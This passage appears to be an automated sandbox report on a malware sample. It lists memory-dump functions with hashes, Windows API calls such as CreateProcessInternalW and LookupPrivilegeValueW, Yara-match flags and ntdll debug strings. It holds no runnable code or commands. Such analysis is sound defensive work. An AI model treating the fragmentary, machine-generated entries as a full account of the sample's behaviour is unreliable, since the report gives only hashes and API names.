Instruction ID: e7685b9e8c1f1ec9e45c72e81b82229443cc091e356c6bdf0612cc09207a9fd5
Opcode Fuzzy Hash: 510652c1f0670a1c0eccf39f2388dd3f33aa35369c9f9dfc3af525a2c5959b6b
Instruction Fuzzy Hash: 0D90027624148802D1106169840474B000597D0341F55C811A4424658D8AD588917161

Uniqueness

Uniqueness Score: -1.00%

Function 02AC96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02AC96DA

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a7d88163826bf54a920ec312bad67553fb2353ed2b92902fe7cb8b4d8a9c165b
Instruction ID: 30e248b5bba28e4ebd62e11c7e1f3fa757515adac5ac11f8db302249e59eec7a
Opcode Fuzzy Hash: a7d88163826bf54a920ec312bad67553fb2353ed2b92902fe7cb8b4d8a9c165b
Instruction Fuzzy Hash: 2C90027624140842D10061694404B47000597E0341F51C416A0124654D8A55C8517561

Uniqueness

Uniqueness Score: -1.00%

Function 02AC9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02AC966A

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9d46cef62b331bf5033f513fdc5dff72b033c77f2d806a8554f1a25e53010a4a
Instruction ID: 757d318cfcddfb9656d19a9ced7e7247dea15277bd2100a27d14ff14a7ea0b2b
Opcode Fuzzy Hash: 9d46cef62b331bf5033f513fdc5dff72b033c77f2d806a8554f1a25e53010a4a
Instruction Fuzzy Hash: 1690027624140802D1807169440464B000597D1341F91C415A0025654DCE558A5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 02AC9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02AC965A

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 122dccbee34253e88aaf2aeb07687be91b7db3ab81be20c03e8321096d5edc18
Instruction ID: 0c64083b5589b6998b7fc7f5278a4489352ca2f5add2a016f08f63e28223002a
Opcode Fuzzy Hash: 122dccbee34253e88aaf2aeb07687be91b7db3ab81be20c03e8321096d5edc18
Instruction Fuzzy Hash: 5390027624544842D14071694404A47001597D0345F51C411A0064694D9A658D55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 02AC9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02AC9A5A

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 45518a242a7743cb0188468a90ab46cd5eadd7368b036516c69a16ed40d0d5a1
Instruction ID: 996cb83cb1adf73109aa1e1a3c62ed97565bf1f700c4b4bcdb63f932178addd8
Opcode Fuzzy Hash: 45518a242a7743cb0188468a90ab46cd5eadd7368b036516c69a16ed40d0d5a1
Instruction Fuzzy Hash: D5900477351C0043D300757D4C14F070005D7D0343F51C515F0154554CCD55CC717571

Uniqueness

Uniqueness Score: -1.00%

Function 02AC9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02AC978A

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3cedbb6eb5a3f58d17e3104cad3c2bd20fe7ed7dc9ff9a10eb986b072d9f1388
Instruction ID: 089473021808988c16249eeba7f8151e39e34af589cf1d05a75e0a740a3a18f3
Opcode Fuzzy Hash: 3cedbb6eb5a3f58d17e3104cad3c2bd20fe7ed7dc9ff9a10eb986b072d9f1388
Instruction Fuzzy Hash: 0E90026E25340002D1807169540860B000597D1242F91D815A0015558CCD5588696361

Uniqueness

Uniqueness Score: -1.00%

Function 02AC9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02AC9FEA

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d927177282b3544b0ce7717e995917b63317e97270b71a6fd1e351a3b99de69b
Instruction ID: eafbf85a5962a530e406d2d16e2013620c92a0ebc09f02727f713ba865b7a421
Opcode Fuzzy Hash: d927177282b3544b0ce7717e995917b63317e97270b71a6fd1e351a3b99de69b
Instruction Fuzzy Hash: B790027635154402D11061698404707000597D1241F51C811A0824558D8AD588917162

Uniqueness

Uniqueness Score: -1.00%

Function 02AC9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02AC971A

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 531901ff3dea39fc773be9d05a53ee9f0b731502c301f20dee428f87af1ad22a
Instruction ID: 2360291d9b5c4b7e45c4fe1af4d526b9a9555280216ba98491a1b426b95ea7bf
Opcode Fuzzy Hash: 531901ff3dea39fc773be9d05a53ee9f0b731502c301f20dee428f87af1ad22a
Instruction Fuzzy Hash: 8290027624140402D10065A95408647000597E0341F51D411A5024555ECAA588917171

Uniqueness

Uniqueness Score: -1.00%

Function 02AC9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02AC986A

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4086dde0165b1bc1adc368e746d1a2bdba781062deb569bb6f65c25dcb3856b6
Instruction ID: 7fce5048d9094a12ee642467df8010079ce5894e8ebe09c0d915e81ce9ee1164
Opcode Fuzzy Hash: 4086dde0165b1bc1adc368e746d1a2bdba781062deb569bb6f65c25dcb3856b6
Instruction Fuzzy Hash: F490027624140413D11161694504707000997D0281F91C812A0424558D9A968952B161

Uniqueness

Uniqueness Score: -1.00%

Function 02AC9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02AC984A

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc9f5ba0644ba4e12fafc2b38cc53062608d964d7e2c761e3e682d770077c728
Instruction ID: 676d6eb94cd5ade0879c0911d025c83929c15aac8b9e590ac8f7a1858ec4807d
Opcode Fuzzy Hash: bc9f5ba0644ba4e12fafc2b38cc53062608d964d7e2c761e3e682d770077c728
Instruction Fuzzy Hash: DE900266282441525545B16944045074006A7E0281B91C412A1414950C89669856E661

Uniqueness

Uniqueness Score: -1.00%

Function 02AC99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02AC99AA

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8b7a303e28027d59616a66a11e47097e25a10123bbeb3745e106307a4ee572e5
Instruction ID: 87d735c1117ff2b2cc2b7ac751d05b487336b625fa64679eab1f6bff67ec1dbc
Opcode Fuzzy Hash: 8b7a303e28027d59616a66a11e47097e25a10123bbeb3745e106307a4ee572e5
Instruction Fuzzy Hash: 899002A638140442D10061694414B070005D7E1341F51C415E1064554D8A59CC527166

Uniqueness

Uniqueness Score: -1.00%

Function 02AC95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02AC95DA

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2007aa31f9218a3ce652379ab9ebac4cb7e308686636ecd2dc865f8e6fbb1cd8
Instruction ID: a52d83387897849e37d5c3432dc6873b275cd804ea6732d6e1e1c54f92e9b0cc
Opcode Fuzzy Hash: 2007aa31f9218a3ce652379ab9ebac4cb7e308686636ecd2dc865f8e6fbb1cd8
Instruction Fuzzy Hash: B19002A624240003410571694414617400A97E0241F51C421E1014590DC96588917165

Uniqueness

Uniqueness Score: -1.00%

Function 02AC9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02AC991A

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6d7400a4810ec0989654f157428072331412a6be571ae879740cf968086bad42
Instruction ID: edb02c5c8d3b2ed446ec87eabe2f0181838b2b1131261f43626855154f394cd7
Opcode Fuzzy Hash: 6d7400a4810ec0989654f157428072331412a6be571ae879740cf968086bad42
Instruction Fuzzy Hash: 1A9002B624140402D14071694404747000597D0341F51C411A5064554E8A998DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 02AC9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02AC954A

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a1720d9806a56f5eff1cc220c5aef5fe1214dcf0c9481f0289ebd9e2e8661d04
Instruction ID: 94c9403591fdd915b09a6555e3695fa13790b944707d907e2482b96075679d25
Opcode Fuzzy Hash: a1720d9806a56f5eff1cc220c5aef5fe1214dcf0c9481f0289ebd9e2e8661d04
Instruction Fuzzy Hash: 8490047F351400030105F57D07045070047D7D53D1751C431F1015550CDF71CC717171

Uniqueness

Uniqueness Score: -1.00%

Function 02428C50, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02428CF8

Strings

wininet.dll, xrefs: 02428CAE, 02428CB7
net.dll, xrefs: 02428CC1, 02428D47, 02428D1F, 02428D2B, 02428D53

Memory Dump Source

Source File: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 5e11523e334d8369aac7e1198b8178c148f0cfea8928895692d69b65021b339b
Instruction ID: ea88a65b78bae2cb782e0f9ddf6bff6ee036a510607a876b8e4a4366407430a5
Opcode Fuzzy Hash: 5e11523e334d8369aac7e1198b8178c148f0cfea8928895692d69b65021b339b
Instruction Fuzzy Hash: 0B3192B6500254BBC724DF66D884FABB7B9EF48700F40851EE62A6B241DB70A654CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02428C46, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02428CF8

Strings

wininet.dll, xrefs: 02428CAE, 02428CB7
net.dll, xrefs: 02428CC1, 02428D1F, 02428D2B

Memory Dump Source

Source File: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: eef005039b208d3e83679b7d3980f5ec8f93bc2b5d7cda11934c928eff854c39
Instruction ID: 6e5854a7a3452c99ecfc74a5b23899d3116b568048753fb9611c1e4431c7d319
Opcode Fuzzy Hash: eef005039b208d3e83679b7d3980f5ec8f93bc2b5d7cda11934c928eff854c39
Instruction Fuzzy Hash: 8531E172500254BBD720DF6AC8C5FABBBB4EF48700F40811EEA69AB241D770A558CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0242A240, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02413AF8), ref: 0242A26D

Strings

.z`, xrefs: 0242A25C, 0242A268

Memory Dump Source

Source File: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 894efdfe3e393a2bebc559f1a59f1636fd51a5faece4e22802c930ba076fa5a4
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 60E046B1210218ABDB18EF9ACC48EA777ADEF88750F018659FE085B241C630F914CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 024182F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0241834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0241836B

Memory Dump Source

Source File: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 3a43bf08853bf4d1c209ad24407e60fd4767927b3b2c21342dcd6e1016b28c63
Instruction ID: b34189b18cc4530f22d4be796cd2c7bf86eaded2b7e67936dac6e68c626c9853
Opcode Fuzzy Hash: 3a43bf08853bf4d1c209ad24407e60fd4767927b3b2c21342dcd6e1016b28c63
Instruction Fuzzy Hash: 2901A731A8033C7BE720A6959C42FBF776DAB40B51F15411AFF04BA1C0E6D56A094AF5

Uniqueness

Uniqueness Score: -1.00%

Function 0241ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0241AD42

Memory Dump Source

Source File: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
Instruction ID: da9cfa0c40bfb5edcfe70dfa16044512793b9835b9b4e0e42988b69bdae3c777
Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
Instruction Fuzzy Hash: EE011EB5D4020DBBDB10EBA5DC85F9EB3799B44308F00819AE90897240FA31E758CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0242A2AF, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0242A304

Memory Dump Source

Source File: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 11e8611614d5aa7385ac34e4fbe879f1e342012abd3f0f42f0473637abf00df2
Instruction ID: 9b576a706a8222bf81d2e1f1e529ffe3eaf4b4da59098fc2a7c8923f13ea7ef8
Opcode Fuzzy Hash: 11e8611614d5aa7385ac34e4fbe879f1e342012abd3f0f42f0473637abf00df2
Instruction Fuzzy Hash: 0F01A4B2210108BFCB54CF99DC90EEB77AAAF8C354F158258FA4DD7241C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0242A2B0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0242A304

Memory Dump Source

Source File: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 995d98605ceebb62652af73eb1972d6c6026fd1ec4ba909f41b98d6df38a82b3
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: E401B2B2210108BFCB54DF89DC80EEB77AEAF8C754F558258FA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02428D80, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0241F020,?,?,00000000), ref: 02428DBC

Memory Dump Source

Source File: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 1843b061e59e101826f7fa4ffef25d1a2627dbedcf6ee43809837b4070948726
Instruction ID: b0a94cd9b4dfbcf9946ccf7a492d0a6cb095403595f267c57344f035c97f32c0
Opcode Fuzzy Hash: 1843b061e59e101826f7fa4ffef25d1a2627dbedcf6ee43809837b4070948726
Instruction Fuzzy Hash: 0CE092333903143AE330659EAC02FA7B39CCB91B21F94002AFB0DEB2C0D995F40546A4

Uniqueness

Uniqueness Score: -1.00%

Function 0242A200, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02424506,?,02424C7F,02424C7F,?,02424506,?,?,?,?,?,00000000,00000000,?), ref: 0242A22D

Memory Dump Source

Source File: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 28c3f08675bd711fea30bf8da483b57d40ab3ef1c4ce074c5ae8f3ebcd6cdce9
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: F8E046B1210218ABDB14EF9ACC40EA777ADEF88750F118559FE085B241C630F915CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 0242A39D, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0241F1A2,0241F1A2,?,00000000,?,?), ref: 0242A3D0

Memory Dump Source

Source File: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 1725ac6186306d1fe50991803bb42474849f4667fcf9c3f665fea4691a940fca
Instruction ID: 19ef523a1f404f639131c5cb90664a90ff6ac48906ce0784fc9946ad55953134
Opcode Fuzzy Hash: 1725ac6186306d1fe50991803bb42474849f4667fcf9c3f665fea4691a940fca
Instruction Fuzzy Hash: 12E026B52042242BDB10DF55DC80ED73BA9DF84350F108A5EFD895B203C434E809CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0242A3A0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0241F1A2,0241F1A2,?,00000000,?,?), ref: 0242A3D0

Memory Dump Source

Source File: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 3fee5bfddccf3df127309cb0a8a950d89a4e3d9da4219e30a325df2b782cb257
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 5DE01AB16002186BDB10DF49CC84EE777ADAF88650F018155BE0857241C930E8158BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0241F69F, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02418CF4,?), ref: 0241F6CB

Memory Dump Source

Source File: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: a81b31fd199d0ff74d36985cd9c3c1b79494b7e6d71b4a4c020e1648b485749b
Instruction ID: eac7a4fd786e518aa5150b7324736058c63289060542d0fa1e3fdc34d4926f2f
Opcode Fuzzy Hash: a81b31fd199d0ff74d36985cd9c3c1b79494b7e6d71b4a4c020e1648b485749b
Instruction Fuzzy Hash: 16D05E717902043AEB20EAB5DC43FAB3396AB64744F594069F949EB3C7EA61D0068920

Uniqueness

Uniqueness Score: -1.00%

Function 0241F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02418CF4,?), ref: 0241F6CB

Memory Dump Source

Source File: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
Instruction ID: bd6295e8d9b5a31d451efa6b720bdcdf5f00d857bc1d495deb2541cf8987c5f4
Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
Instruction Fuzzy Hash: 23D0A7717903043BF610FAA59C03F2732CD9B54B04F490065FA48D73C3ED50E0014565

Uniqueness

Uniqueness Score: -1.00%

Function 02AC967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02AC9694

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4cd8cd87dca78ae75bb436302761436229aa52abf708579a153baee7dcf134dd
Instruction ID: 75243f3d15e3c845fa8d44e2521cd7a254df0aa2feb77796ed2f041dde3517f6
Opcode Fuzzy Hash: 4cd8cd87dca78ae75bb436302761436229aa52abf708579a153baee7dcf134dd
Instruction Fuzzy Hash: 9AB09B729414C5C5D611E7704608727794077D0741F26C455D1030645A4B78C091F6B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02B3B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

write to, xrefs: 02B3B4A6
Go determine why that thread has not released the critical section., xrefs: 02B3B3C5
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 02B3B3D6
*** enter .cxr %p for the context, xrefs: 02B3B50D
read from, xrefs: 02B3B4AD, 02B3B4B2
The instruction at %p referenced memory at %p., xrefs: 02B3B432
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 02B3B39B
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 02B3B314
The critical section is owned by thread %p., xrefs: 02B3B3B9
*** Resource timeout (%p) in %ws:%s, xrefs: 02B3B352
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 02B3B47D
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 02B3B38F
<unknown>, xrefs: 02B3B27E, 02B3B2D1, 02B3B350, 02B3B399, 02B3B417, 02B3B48E
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 02B3B305
a NULL pointer, xrefs: 02B3B4E0
*** enter .exr %p for the exception record, xrefs: 02B3B4F1
The instruction at %p tried to %s , xrefs: 02B3B4B6
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 02B3B476
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 02B3B2DC
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 02B3B323
*** An Access Violation occurred in %ws:%s, xrefs: 02B3B48F
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 02B3B53F
*** Inpage error in %ws:%s, xrefs: 02B3B418
*** A stack buffer overrun occurred in %ws:%s, xrefs: 02B3B2F3
The resource is owned shared by %d threads, xrefs: 02B3B37E
*** then kb to get the faulting stack, xrefs: 02B3B51C
The resource is owned exclusively by thread %p, xrefs: 02B3B374
This failed because of error %Ix., xrefs: 02B3B446
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 02B3B484
an invalid address, %p, xrefs: 02B3B4CF

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your 